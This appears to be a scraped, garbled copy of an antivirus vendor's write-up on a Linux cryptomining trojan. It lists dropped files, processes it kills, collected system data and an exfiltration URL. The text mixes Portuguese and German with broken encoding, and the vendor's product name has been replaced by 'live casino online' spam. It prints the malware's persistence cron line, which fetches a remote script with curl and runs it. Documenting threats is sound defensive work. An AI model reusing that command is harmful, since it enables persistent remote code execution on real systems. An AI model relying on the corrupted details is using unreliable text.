Analisado por: Joshua Paul Ignacio   

 

N/A

 Plataforma:

Linux

 Classificao do risco total:
 Potencial de dano:
 Potencial de distribui??o:
 infec??o relatada:
 Exposi??o das informa??es:
Baixo
Medium
Alto
°ä°ù¨ª³Ù¾±³¦´Ç

  • Tipo de grayware:
    Trojan

  • Destrutivo:
    N?o

  • Criptografado:
    N?o

  • In the Wild:
    Sim

  Vis?o geral

Canal de infec??o: Aus dem Internet heruntergeladen, Fallen gelassen von anderer Malware

Wird m?glicherweise von anderer Malware/Grayware/Spyware von externen Sites heruntergeladen.

L?scht Dateien, so dass Programme und Anwendungen nicht ordnungsgem?? ausgef¨¹hrt werden.

L?scht sich nach der Ausf¨¹hrung selbst.

  Detalhes t¨¦cnicos

Tipo de compacta??o: 1,927 bytes
Tipo de arquivo: , Other
Residente na mem¨®ria: N?o
Data de recebimento das amostras iniciais: 06 janeiro 2020
Carga ¨²til: Connects to URLs/IPs, Steals information, Downloads files

?bertragungsdetails

Wird m?glicherweise von der folgenden Malware/Grayware/Spyware von externen Sites heruntergeladen:

Installation

Schleust die folgenden Dateien ein und f¨¹hrt sie aus:

  • x
  • start.pl

Erstellt die folgenden Ordner:

  • /var/tmp/.nano
  • /tmp/.vd

Andere System?nderungen

L?scht die folgenden Dateien:

  • nohup.out
  • /tmp/min.sh
  • /tmp/min
  • /tmp/nohup.out
  • /tmp/cron.d
  • /var/tmp/.nano
  • /{Current Directory}/cron.d
  • cron.d
  • .bin
  • /dev/shm/.bin
  • /tmp/.bin
  • /dev/shm/monero.tgz
  • .vd
  • /tmp/.vd
  • /tmp/.vd/sslm.tgz
  • min*
  • {Current Directory}/min*
  • /tmp/min*

Prozessbeendigung

Beendet die folgenden Prozesse, wenn sie im Speicher des betroffenen Systems ausgef¨¹hrt werden:

  • rand
  • rx
  • rd
  • tsm
  • tsm2
  • haiduc
  • a
  • sparky
  • sh
  • 2238Xae
  • b
  • f
  • i
  • p
  • y
  • rsync
  • ps
  • go
  • x
  • s
  • b
  • run
  • idle
  • minerd
  • crond
  • yam
  • xmr
  • python
  • cron
  • ntpd
  • start
  • start.sh
  • libssl
  • sparky.sh

Download-Routine

Speichert die heruntergeladenen Dateien unter den folgenden Namen:

Datendiebstahl

Folgende Daten werden gesammelt:

  • Current Directory
  • username
  • System time and date
  • Kernel Information
  • Number of Processing Units
  • List of Display Interface

Entwendete Daten

Sendet die gesammelten Daten ¨¹ber HTTP-POST an den folgenden URL:

  • http://{BLOCKED}ter.com/assets/.style/remote/info.php

Andere Details

Es macht Folgendes:

  • It creates the following cron jobs for persistence:
    Path: {Current Directory}/cron.d
    • Schedule: Every 30 minutes
    • Command: */30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.nnao && /usr/bin/curl -s https://upajmeter.com/assets/.style/nano.sh && /bin/chmod +x /var/tmp/.nano/nano.sh && /var/tmp/.nano/nano.sh

L?scht sich nach der Ausf¨¹hrung selbst.

  Solu??o

Mecanismo de varredura m¨ªnima: 9.850
Primeiro arquivo padr?o VSAPI: 15.608.01
Data do lan?amento do primeiro padr?o VSAPI: 07 janeiro 2020
VSAPI OPR Pattern Version: 15.609.00
VSAPI OPR Pattern ver?ffentlicht am: 08 janeiro 2020

Durchsuchen Sie Ihren Computer mit Ihrem live casino online Produkt, und l?schen Sie Dateien, die als Trojan.SH.MALXMR.UWEJS entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem live casino online Produkt ges?ubert, gel?scht oder in Quarant?ne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarant?ne k?nnen einfach gel?scht werden. Auf dieser finden Sie weitere Informationen.


Participe da nossa pesquisa!